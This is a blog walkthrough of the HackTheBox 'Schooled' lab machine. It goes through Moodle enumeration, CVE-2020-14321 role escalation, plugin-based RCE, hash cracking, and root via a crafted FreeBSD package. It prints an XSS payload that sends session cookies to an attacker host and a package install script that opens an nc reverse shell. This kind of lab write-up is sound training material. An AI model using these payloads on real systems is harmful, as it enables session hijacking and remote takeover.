Home Hackthebox Schooled walkthrough
Post
Cancel

Hackthebox Schooled walkthrough

Schooled

Summary :

  • 1 - Stealing admin's cookie with XSS
  • 2 - Privilege escalation using a CVE
  • 3 - Getting RCE
  • 4 - Database Enumeration
  • 5 - Password cracking
  • 6 - Creating malicious pkg

    Scanning phase :

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    
    Not shown: 998 closed ports  
     PORT  STATE SERVICE VERSION  
     22/tcp open ssh   OpenSSH 7.9 (FreeBSD 20200214; protocol 2.0)  
     | ssh-hostkey:   
     |  2048 1d:69:83:78:fc:91:f8:19:c8:75:a7:1e:76:45:05:dc (RSA)  
     |  256 e9:b2:d2:23:9d:cf:0e:63:e0:6d:b9:b1:a6:86:93:38 (ECDSA)  
     |_ 256 7f:51:88:f7:3c:dd:77:5e:ba:25:4d:4c:09:25:ea:1f (ED25519)  
     80/tcp open http  Apache httpd 2.4.46 ((FreeBSD) PHP/7.4.15)  
     |_http-favicon: Unknown favicon MD5: 460AF0375ECB7C08C3AE0B6E0B82D717  
     | http-methods:   
     |  Supported Methods: GET POST OPTIONS HEAD TRACE  
     |_ Potentially risky methods: TRACE  
     |_http-server-header: Apache/2.4.46 (FreeBSD) PHP/7.4.15  
     |_http-title: Schooled - A new kind of educational institute  
     No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
    

    We found two open ports (22 - 80).

    So what should we do here ?

    1 - Searching for an exploit for the running services.
    2 - Check the website and see what we can find.

    Enumeration :

    web

    I start checking the application and nothing works, i only found a contact list.

    contact-list

    I saw admissions@schooled.htb i was suspicious so i tried to add it as a subdomain “admissions.schooled.htb” but it didn’t work.

    Now i will try see if there is another subdomain.

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    
    ffuf -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://schooled.htb/ -H 'Host: FUZZ.schooled.htb'  
         /'___\ /'___\      /'___\      
         /\ \__/ /\ \__/ __ __ /\ \__/      
         \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\     
         \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/     
          \ \_\  \ \_\ \ \____/ \ \_\      
          \/_/  \/_/  \/___/  \/_/      
         v1.2.0-git  
     ________________________________________________  
      :: Method      : GET  
      :: URL       : http://schooled.htb/  
      :: Wordlist     : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt  
      :: Header      : Host: FUZZ.schooled.htb  
      :: Follow redirects : false  
      :: Calibration   : false  
      :: Timeout     : 10  
      :: Threads     : 40  
      :: Matcher     : Response status: 200,204,301,302,307,401,403  
     ________________________________________________  
     moodle         [Status: 200, Size: 84, Words: 5, Lines: 2]  
    

    boom

    There is our subdomain !

    login

    Now let’s check if we can create an account.

    Creating-an-account

    account

    Creating an account should be in that formula name@student.schooled.htb

    logged-in

    After some searching i found this CVE-2020-14321 that is the latest CVE for moodle so it should be for that box 😉

    So if you read the CVE you should understood that i should have teacher role to use it.

    After a while i found that the only course i can enrol is math course.

    Math

    I read the announcements and i found this.

    hint

    So the teacher interact with the user through moodleNet profile.

    The first thing came into my head that i should use xss to steal his cookie, let’s try it.

    Payload : <img src=x onerror=this.src=’http://10.10.x.x:8000/?’+document.cookie;>

    xss

    server

    wow

    session-hijacking1

    Now we are manuel Phillips.

    The next thing is enrolling a user, intercept the request, change the role to 1, and ID to our ID. This process will allow us to log in as the user we add. You must pick a user that has a manager role, which in our case is Lianne Carter.

    Let’s do it !

    intercept-id

    Now look at the left panel.

    administration

    We have site administration now.

    To get our RCE we have to install a custom plugin but we should edit our role to be able to install plugin.

    Go to Users > Define Roles > Manager > Edit to edit our role, intercept the request and change it with the one on github.

    change-role

    Now we can install plugin.

    plugin

    Just follow Moodle Rce and trigger the rce at “domain/blocks/rce/lang/en/block_rce.php?cmd=id”

    rce1

    Foothold :

    We got our shell !!

    shell

    After some enumeration i found database configuration file.

    DB

    When i tried to use mysql the OS didn’t find it, so i looked for it in /usr/local/bin and i found it, let’s get the creds !

    creds

    Now let’s crack the hash.

    crack

    User Flag :

    Jamies password = !QAZ2wsx

    Let’s grab our SSH.

    sssh1

    Privilege escalation :

    After using sudo -l, we can install pkg with nopasswd.

    sudo

    I found this refernce to create a pkg http://lastsummer.de/creating-custom-packages-on-freebsd/

    Script for getting root :

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    
     #!/bin/sh  
     STAGEDIR=/tmp/package  
     rm -rf ${STAGEDIR}  
     mkdir -p ${STAGEDIR}  
     cat >> ${STAGEDIR}/+PRE_INSTALL <<EOF  
     echo “Resetting root shell”  
     rm /tmp/a;mkfifo /tmp/a;cat /tmp/a|/bin/sh -i 2>&1|nc 10.10.x.x 9080 >/tmp/a  
     EOF  
     cat >> ${STAGEDIR}/+POST_INSTALL <<EOF  
     echo “Registering root shell”  
     pw usermod -n root -s /bin/sh  
     EOF  
     cat >> ${STAGEDIR}/+MANIFEST <<EOF  
     name: mypackage  
     version: “1.0_5”  
     origin: sysutils/mypackage  
     comment: “automates stuff”  
     desc: “automates tasks which can also be undone later”  
     maintainer: john@doe.it  
     www: https://doe.it  
     prefix: /  
     EOF  
     pkg create -m ${STAGEDIR}/ -r ${STAGEDIR}/ -o .  
    

    This script will create .txz file.

    txs

    Root flag :

    1 - Setup a listner on your machine
    2 - use this command “sudo pkg install –no-repo-update *.txz”

    root

    montana

  • This post is licensed under CC BY 4.0 by the author.